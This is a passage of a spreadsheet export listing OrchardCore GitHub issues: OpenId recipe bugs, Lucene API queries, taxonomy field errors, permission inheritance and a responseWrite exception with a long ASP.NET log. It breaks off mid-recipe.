    <t>https://github.com/OrchardCMS/OrchardCore/issues/6364</t>
  </si>
  <si>
    <t>OpenId Deployment and Recipes have some issues</t>
  </si>
  <si>
    <t>There are a number of issues with the OpenId Recipe and Deployment Steps - The Deployment Step for the Server Settings produces **completely incorrect** JSON to match what the Recipe Step is expecting (the settings directly, when the step expects a Model) - Some of the Steps use Models, some use `CreateViewModels` - Most of the Steps are storing their data directly in the step property, where they should be keyed. (Minor issue) - The Application Step can only be run once, as it does not check to see if the application already exists, so throws an exception the second time.</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/6520</t>
  </si>
  <si>
    <t>Lucene Query Api the the endpoints work with get only i can't get to work with post requests</t>
  </si>
  <si>
    <t>what type of body do we use when querying the endpoint because i tried most and nothing work with post here is the get request :  https://localhost:5001/api/lucene/content?query={ "query": { "bool": { "must" :[ {"term": { "Content.ContentItem.ContentType": "Meal" }}, { "term": { "Meal.AdType": "{{type}}" }}, ] } }, "sort": { "Content.ContentItem.CreatedUtc": { "order": "desc", "type": "double" } }, "size": 3 }&amp;indexName=Meal&amp;parameters={"type": "Rent" }  This works fine in postman but when i try it using post items null I also noticed the endpoints result is not consistent the content return the items with count and the document doesn't</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/8986</t>
  </si>
  <si>
    <t>TaxonomyField with Tags display, error 400</t>
  </si>
  <si>
    <t xml:space="preserve"> Describe the bug Taxonomy field with Tags display placed in ContentPart inside Widget throws error while saving content item.  To Reproduce Steps to reproduce the behavior: 1. Create content part with taxonomy field and tags display 2. Create widget, add content part from step 1 3. Add widget to flow of some content item 4. Try save = throws error 400  Expected behavior Content item should be saved. Also, it works when Standard display is used.</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/9362</t>
  </si>
  <si>
    <t>OpenId don't handles inherited (ImpliedBy) permissions</t>
  </si>
  <si>
    <t>Testing Application access with OpenId module with Client Credentials flow, it appears that ImpliedBy permission are not honored.  To Reproduce 1. Create a tenant with at least one content 2. Enable "OpenID Authorization Server" &amp; "OpenID Token Validation" 3. Create a role for your app and check "Access content via the api" &amp; "Publish or unpublish content for others" (note the "Edit content for others" is implied) 4. Enable "Allow Client Credentials Flow" in OpenID Connect 5. Add an Application in OpenID Connect with "Allow Client Credentials Flow" and check the role you created at step 3 6. Retrieve a token and a content item using the Contents API controller 7. Try to update the content using the Contents API controller You will receive a 403Forbidden  Expected behavior It should be allowed</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/9508</t>
  </si>
  <si>
    <t>Workflow : Recaptcha with application/json header Content-Type fails.</t>
  </si>
  <si>
    <t>Here is the issue I get when using application/json with the reCaptcha : ![MicrosoftTeams-image](https://user-images.githubusercontent.com/3228637/119055846-b4d52580-b997-11eb-9843-797c418c42a3.png) So basically I'm trying to validate the recaptcha with it's data-callback method to get it's validation token. Send it to the Workflow as g-recaptcha-response form value so that it passes. As soon as I add the reCaptcha task to the Workflow it faults with an error message saying : "Incorrect Content Type : application/json"</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/10190</t>
  </si>
  <si>
    <t>Can't get access token via email address as user name</t>
  </si>
  <si>
    <t xml:space="preserve"> Describe the bug  To Reproduce Get access token via POST https://localhost:44391/connect/token - grant_type - scope - username - password - client_id If I use the user name, It works. However, if I use user email. It doesn't work.  Expected behavior - According to this discussion thread: https://github.com/OrchardCMS/OrchardCore/pull/7645. There is a change to not allow the username = email. However, there should be a fallback to authenticate by username or email. - I expect I can use username or email as to login.  Screenshots ![image](https://user-images.githubusercontent.com/11371581/131404090-dc0ab09c-5269-479f-8dd4-b5fe8b3ffb43.png)</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/11953</t>
  </si>
  <si>
    <t>InvalidOperationException when using responseWrite scripting method</t>
  </si>
  <si>
    <t>I'm getting **InvalidOperationException** when using **responseWrite** scripting method.  info: Microsoft.AspNetCore.Hosting.Diagnostics[1] Request starting HTTP/1.1 GET https://localhost:5001/workflows/Invoke?token=CfDJ8Eccv2rzJ8pOsQGIv-oI-6cWwyOvjunMaqTWq_jcEcY0NkLbf5JNyYB2ZbY1fj27bFXUunUUNKXl2FSfHa4zfffO0VytS91u4s7j3ozewqW_M_JPrPST0i4urJCrPTzFKoIvKA95lC1Pl0SashQXbhL_9TaWCOiK6YaNYRwGWkGY8jf8HENyNCOWm3aqD8PCDO2lpbnTr4ky9_GWDQTkMrbxTkqYMVQE41AM-0ez343a - - Microsoft.AspNetCore.Hosting.Diagnostics: Information: Request starting HTTP/1.1 GET https://localhost:5001/workflows/Invoke?token=CfDJ8Eccv2rzJ8pOsQGIv-oI-6cWwyOvjunMaqTWq_jcEcY0NkLbf5JNyYB2ZbY1fj27bFXUunUUNKXl2FSfHa4zfffO0VytS91u4s7j3ozewqW_M_JPrPST0i4urJCrPTzFKoIvKA95lC1Pl0SashQXbhL_9TaWCOiK6YaNYRwGWkGY8jf8HENyNCOWm3aqD8PCDO2lpbnTr4ky9_GWDQTkMrbxTkqYMVQE41AM-0ez343a - - OrchardCore.Modules.ModularTenantRouterMiddleware: Information: Begin Routing Request info: OrchardCore.Modules.ModularTenantRouterMiddleware[0] Begin Routing Request Microsoft.AspNetCore.Routing.EndpointMiddleware: Information: Executing endpoint 'OrchardCore.Workflows.Http.Controllers.HttpWorkflowController.Invoke (OrchardCore.Workflows)' info: Microsoft.AspNetCore.Routing.EndpointMiddleware[0] Executing endpoint 'OrchardCore.Workflows.Http.Controllers.HttpWorkflowController.Invoke (OrchardCore.Workflows)' Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker: Information: Route matched with {area = "OrchardCore.Workflows", action = "Invoke", controller = "HttpWorkflow"}. Executing controller action with signature System.Threading.Tasks.Task`1[Microsoft.AspNetCore.Mvc.IActionResult] Invoke(System.String) on controller OrchardCore.Workflows.Http.Controllers.HttpWorkflowController (OrchardCore.Workflows). info: Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker[3] Route matched with {area = "OrchardCore.Workflows", action = "Invoke", controller = "HttpWorkflow"}. Executing controller action with signature System.Threading.Tasks.Task`1[Microsoft.AspNetCore.Mvc.IActionResult] Invoke(System.String) on controller OrchardCore.Workflows.Http.Controllers.HttpWorkflowController (OrchardCore.Workflows). OrchardCore.Workflows.Http.Controllers.HttpWorkflowController: Debug: Invoking new workflow of type '4qcvrdnwpnck85v99s6cypg3ws' with start activity '4vpxs6hpwaxc45qzeqzbqh95dh' dbug: OrchardCore.Workflows.Http.Controllers.HttpWorkflowController[0] Invoking new workflow of type '4qcvrdnwpnck85v99s6cypg3ws' with start activity '4vpxs6hpwaxc45qzeqzbqh95dh' Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor: Information: Executing AcceptedResult, writing value of type 'null'. info: Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor[1] Executing AcceptedResult, writing value of type 'null'. Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker: Information: Executed action OrchardCore.Workflows.Http.Controllers.HttpWorkflowController.Invoke (OrchardCore.Workflows) in 17.1947ms info: Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker[2] Executed action OrchardCore.Workflows.Http.Controllers.HttpWorkflowController.Invoke (OrchardCore.Workflows) in 17.1947ms Microsoft.AspNetCore.Routing.EndpointMiddleware: Information: Executed endpoint 'OrchardCore.Workflows.Http.Controllers.HttpWorkflowController.Invoke (OrchardCore.Workflows)' info: Microsoft.AspNetCore.Routing.EndpointMiddleware[1] Executed endpoint 'OrchardCore.Workflows.Http.Controllers.HttpWorkflowController.Invoke (OrchardCore.Workflows)' Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware: Error: An unhandled exception has occurred while executing the request. System.InvalidOperationException: StatusCode cannot be set because the response has already started. at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.ThrowResponseAlreadyStartedException(String value) at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.Microsoft.AspNetCore.Http.Features.IHttpResponseFeature.set_StatusCode(Int32 value) at Microsoft.AspNetCore.Http.DefaultHttpResponse.set_StatusCode(Int32 value) at Microsoft.AspNetCore.Mvc.ObjectResult.OnFormatting(ActionContext context) at Microsoft.AspNetCore.Mvc.AcceptedResult.OnFormatting(ActionContext context) at Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor.ExecuteAsyncCore(ActionContext context, ObjectResult result, Type objectType, Object value) at Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor.ExecuteAsync(ActionContext context, ObjectResult result) at Microsoft.AspNetCore.Mvc.ObjectResult.ExecuteResultAsync(ActionContext context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeNextResultFilterAsync[TFilter,TFilterAsync]()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResultExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeResultFilters()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeNextResourceFilter&gt;g__Awaited|25_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResourceExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Next(State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeFilterPipelineAsync()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Routing.EndpointMiddleware.&lt;Invoke&gt;g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger) at SixLabors.ImageSharp.Web.Middleware.ImageSharpMiddleware.Invoke(HttpContext httpContext, Boolean retry) at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context) at OrchardCore.Apis.GraphQL.GraphQLMiddleware.Invoke(HttpContext context, IAuthorizationService authorizationService, IAuthenticationService authenticationService, ISchemaFactory schemaService) at OrchardCore.Liquid.ScriptsMiddleware.Invoke(HttpContext httpContext) at Microsoft.AspNetCore.Authentication.AuthenticationMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Localization.RequestLocalizationMiddleware.Invoke(HttpContext context) at OrchardCore.Diagnostics.DiagnosticsStartupFilter.&lt;&gt;c__DisplayClass3_0.&lt;&lt;Configure&gt;b__1&gt;d.MoveNext()  End of stack trace from previous location  at Microsoft.AspNetCore.Diagnostics.StatusCodePagesMiddleware.Invoke(HttpContext context) at OrchardCore.ContentPreview.PreviewStartupFilter.&lt;&gt;c.&lt;&lt;Configure&gt;b__1_1&gt;d.MoveNext()  End of stack trace from previous location  at OrchardCore.Modules.ModularTenantRouterMiddleware.Invoke(HttpContext httpContext) at OrchardCore.Modules.ModularTenantContainerMiddleware.&lt;&gt;c__DisplayClass4_0.&lt;&lt;Invoke&gt;b__0&gt;d.MoveNext()  End of stack trace from previous location  at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Modules.ModularTenantContainerMiddleware.Invoke(HttpContext httpContext) at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context) fail: Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware[1] An unhandled exception has occurred while executing the request. System.InvalidOperationException: StatusCode cannot be set because the response has already started. at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.ThrowResponseAlreadyStartedException(String value) at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.Microsoft.AspNetCore.Http.Features.IHttpResponseFeature.set_StatusCode(Int32 value) at Microsoft.AspNetCore.Http.DefaultHttpResponse.set_StatusCode(Int32 value) at Microsoft.AspNetCore.Mvc.ObjectResult.OnFormatting(ActionContext context) at Microsoft.AspNetCore.Mvc.AcceptedResult.OnFormatting(ActionContext context) at Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor.ExecuteAsyncCore(ActionContext context, ObjectResult result, Type objectType, Object value) at Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor.ExecuteAsync(ActionContext context, ObjectResult result) at Microsoft.AspNetCore.Mvc.ObjectResult.ExecuteResultAsync(ActionContext context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeNextResultFilterAsync[TFilter,TFilterAsync]()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResultExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeResultFilters()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeNextResourceFilter&gt;g__Awaited|25_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResourceExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Next(State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeFilterPipelineAsync()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Routing.EndpointMiddleware.&lt;Invoke&gt;g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger) at SixLabors.ImageSharp.Web.Middleware.ImageSharpMiddleware.Invoke(HttpContext httpContext, Boolean retry) at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context) at OrchardCore.Apis.GraphQL.GraphQLMiddleware.Invoke(HttpContext context, IAuthorizationService authorizationService, IAuthenticationService authenticationService, ISchemaFactory schemaService) at OrchardCore.Liquid.ScriptsMiddleware.Invoke(HttpContext httpContext) at Microsoft.AspNetCore.Authentication.AuthenticationMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Localization.RequestLocalizationMiddleware.Invoke(HttpContext context) at OrchardCore.Diagnostics.DiagnosticsStartupFilter.&lt;&gt;c__DisplayClass3_0.&lt;&lt;Configure&gt;b__1&gt;d.MoveNext()  End of stack trace from previous location  at Microsoft.AspNetCore.Diagnostics.StatusCodePagesMiddleware.Invoke(HttpContext context) at OrchardCore.ContentPreview.PreviewStartupFilter.&lt;&gt;c.&lt;&lt;Configure&gt;b__1_1&gt;d.MoveNext()  End of stack trace from previous location  at OrchardCore.Modules.ModularTenantRouterMiddleware.Invoke(HttpContext httpContext) at OrchardCore.Modules.ModularTenantContainerMiddleware.&lt;&gt;c__DisplayClass4_0.&lt;&lt;Invoke&gt;b__0&gt;d.MoveNext()  End of stack trace from previous location  at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Modules.ModularTenantContainerMiddleware.Invoke(HttpContext httpContext) at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context) Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware: Warning: The response has already started, the error page middleware will not be executed. warn: Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware[2] The response has already started, the error page middleware will not be executed. fail: Microsoft.AspNetCore.Server.Kestrel[13] Connection id "0HMITFOP71NAH", Request id "0HMITFOP71NAH:00000002": An unhandled exception was thrown by the application. System.InvalidOperationException: StatusCode cannot be set because the response has already started. at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.ThrowResponseAlreadyStartedException(String value) at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.Microsoft.AspNetCore.Http.Features.IHttpResponseFeature.set_StatusCode(Int32 value) at Microsoft.AspNetCore.Http.DefaultHttpResponse.set_StatusCode(Int32 value) at Microsoft.AspNetCore.Mvc.ObjectResult.OnFormatting(ActionContext context) at Microsoft.AspNetCore.Mvc.AcceptedResult.OnFormatting(ActionContext context) at Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor.ExecuteAsyncCore(ActionContext context, ObjectResult result, Type objectType, Object value) at Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor.ExecuteAsync(ActionContext context, ObjectResult result) at Microsoft.AspNetCore.Mvc.ObjectResult.ExecuteResultAsync(ActionContext context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeNextResultFilterAsync[TFilter,TFilterAsync]()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResultExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeResultFilters()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeNextResourceFilter&gt;g__Awaited|25_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResourceExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Next(State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeFilterPipelineAsync()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Routing.EndpointMiddleware.&lt;Invoke&gt;g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger) at SixLabors.ImageSharp.Web.Middleware.ImageSharpMiddleware.Invoke(HttpContext httpContext, Boolean retry) at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context) at OrchardCore.Apis.GraphQL.GraphQLMiddleware.Invoke(HttpContext context, IAuthorizationService authorizationService, IAuthenticationService authenticationService, ISchemaFactory schemaService) at OrchardCore.Liquid.ScriptsMiddleware.Invoke(HttpContext httpContext) at Microsoft.AspNetCore.Authentication.AuthenticationMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Localization.RequestLocalizationMiddleware.Invoke(HttpContext context) at OrchardCore.Diagnostics.DiagnosticsStartupFilter.&lt;&gt;c__DisplayClass3_0.&lt;&lt;Configure&gt;b__1&gt;d.MoveNext()  End of stack trace from previous location  at Microsoft.AspNetCore.Diagnostics.StatusCodePagesMiddleware.Invoke(HttpContext context) at OrchardCore.ContentPreview.PreviewStartupFilter.&lt;&gt;c.&lt;&lt;Configure&gt;b__1_1&gt;d.MoveNext()  End of stack trace from previous location  at OrchardCore.Modules.ModularTenantRouterMiddleware.Invoke(HttpContext httpContext) at OrchardCore.Modules.ModularTenantContainerMiddleware.&lt;&gt;c__DisplayClass4_0.&lt;&lt;Invoke&gt;b__0&gt;d.MoveNext()  End of stack trace from previous location  at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Modules.ModularTenantContainerMiddleware.Invoke(HttpContext httpContext) at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.ProcessRequests[TContext](IHttpApplication`1 application) Microsoft.AspNetCore.Server.Kestrel: Error: Connection id "0HMITFOP71NAH", Request id "0HMITFOP71NAH:00000002": An unhandled exception was thrown by the application. System.InvalidOperationException: StatusCode cannot be set because the response has already started. at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.ThrowResponseAlreadyStartedException(String value) at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.Microsoft.AspNetCore.Http.Features.IHttpResponseFeature.set_StatusCode(Int32 value) at Microsoft.AspNetCore.Http.DefaultHttpResponse.set_StatusCode(Int32 value) at Microsoft.AspNetCore.Mvc.ObjectResult.OnFormatting(ActionContext context) at Microsoft.AspNetCore.Mvc.AcceptedResult.OnFormatting(ActionContext context) at Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor.ExecuteAsyncCore(ActionContext context, ObjectResult result, Type objectType, Object value) at Microsoft.AspNetCore.Mvc.Infrastructure.ObjectResultExecutor.ExecuteAsync(ActionContext context, ObjectResult result) at Microsoft.AspNetCore.Mvc.ObjectResult.ExecuteResultAsync(ActionContext context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeNextResultFilterAsync[TFilter,TFilterAsync]()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResultExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeResultFilters()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeNextResourceFilter&gt;g__Awaited|25_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResourceExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Next(State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeFilterPipelineAsync()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Routing.EndpointMiddleware.&lt;Invoke&gt;g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger) at SixLabors.ImageSharp.Web.Middleware.ImageSharpMiddleware.Invoke(HttpContext httpContext, Boolean retry) at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context) at OrchardCore.Apis.GraphQL.GraphQLMiddleware.Invoke(HttpContext context, IAuthorizationService authorizationService, IAuthenticationService authenticationService, ISchemaFactory schemaService) at OrchardCore.Liquid.ScriptsMiddleware.Invoke(HttpContext httpContext) at Microsoft.AspNetCore.Authentication.AuthenticationMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Localization.RequestLocalizationMiddleware.Invoke(HttpContext context) at OrchardCore.Diagnostics.DiagnosticsStartupFilter.&lt;&gt;c__DisplayClass3_0.&lt;&lt;Configure&gt;b__1&gt;d.MoveNext()  End of stack trace from previous location  at Microsoft.AspNetCore.Diagnostics.StatusCodePagesMiddleware.Invoke(HttpContext context) at OrchardCore.ContentPreview.PreviewStartupFilter.&lt;&gt;c.&lt;&lt;Configure&gt;b__1_1&gt;d.MoveNext()  End of stack trace from previous location  at OrchardCore.Modules.ModularTenantRouterMiddleware.Invoke(HttpContext httpContext) at OrchardCore.Modules.ModularTenantContainerMiddleware.&lt;&gt;c__DisplayClass4_0.&lt;&lt;Invoke&gt;b__0&gt;d.MoveNext()  End of stack trace from previous location  at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Environment.Shell.Scope.ShellScope.UsingAsync(Func`2 execute, Boolean activateShell) at OrchardCore.Modules.ModularTenantContainerMiddleware.Invoke(HttpContext httpContext) at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.ProcessRequests[TContext](IHttpApplication`1 application) Microsoft.AspNetCore.Hosting.Diagnostics: Information: Request finished HTTP/1.1 GET https://localhost:5001/workflows/Invoke?token=CfDJ8Eccv2rzJ8pOsQGIv-oI-6cWwyOvjunMaqTWq_jcEcY0NkLbf5JNyYB2ZbY1fj27bFXUunUUNKXl2FSfHa4zfffO0VytS91u4s7j3ozewqW_M_JPrPST0i4urJCrPTzFKoIvKA95lC1Pl0SashQXbhL_9TaWCOiK6YaNYRwGWkGY8jf8HENyNCOWm3aqD8PCDO2lpbnTr4ky9_GWDQTkMrbxTkqYMVQE41AM-0ez343a - - - 200 - - 237.3082ms info: Microsoft.AspNetCore.Hosting.Diagnostics[2] Request finished HTTP/1.1 GET https://localhost:5001/workflows/Invoke?token=CfDJ8Eccv2rzJ8pOsQGIv-oI-6cWwyOvjunMaqTWq_jcEcY0NkLbf5JNyYB2ZbY1fj27bFXUunUUNKXl2FSfHa4zfffO0VytS91u4s7j3ozewqW_M_JPrPST0i4urJCrPTzFKoIvKA95lC1Pl0SashQXbhL_9TaWCOiK6YaNYRwGWkGY8jf8HENyNCOWm3aqD8PCDO2lpbnTr4ky9_GWDQTkMrbxTkqYMVQE41AM-0ez343a - - - 200 - - 237.3082ms info: OrchardCore.Modules.ModularBackgroundService[0] Start processing background task 'OrchardCore.Workflows.Timers.TimerBackgroundTask' on tenant 'Default'. OrchardCore.Modules.ModularBackgroundService: Information: Start processing background task 'OrchardCore.Workflows.Timers.TimerBackgroundTask' on tenant 'Default'. info: OrchardCore.Modules.ModularBackgroundService[0] Finished processing background task 'OrchardCore.Workflows.Timers.TimerBackgroundTask' on tenant 'Default'. OrchardCore.Modules.ModularBackgroundService: Information: Finished processing background task 'OrchardCore.Workflows.Timers.TimerBackgroundTask' on tenant 'Default'.  you can try to repro this issue, using simple workflow:  { "name": "", "displayName": "", "description": "", "author": "", "website": "", "version": "", "issetuprecipe": false, "categories": [], "tags": [], "steps": [ { "name": "Feature", "enable": [ "Application.Default", "TryOrchardCore.Web", "OrchardCore.Settings", "OrchardCore.Admin", "OrchardCore.Liquid", "OrchardCore.Contents", "OrchardCore.ContentTypes", "OrchardCore.Templates", "OrchardCore.Alias", "OrchardCore.Autoroute", "OrchardCore.Resources", "OrchardCore.Features", "OrchardCore.Scripting", "OrchardCore.Recipes", 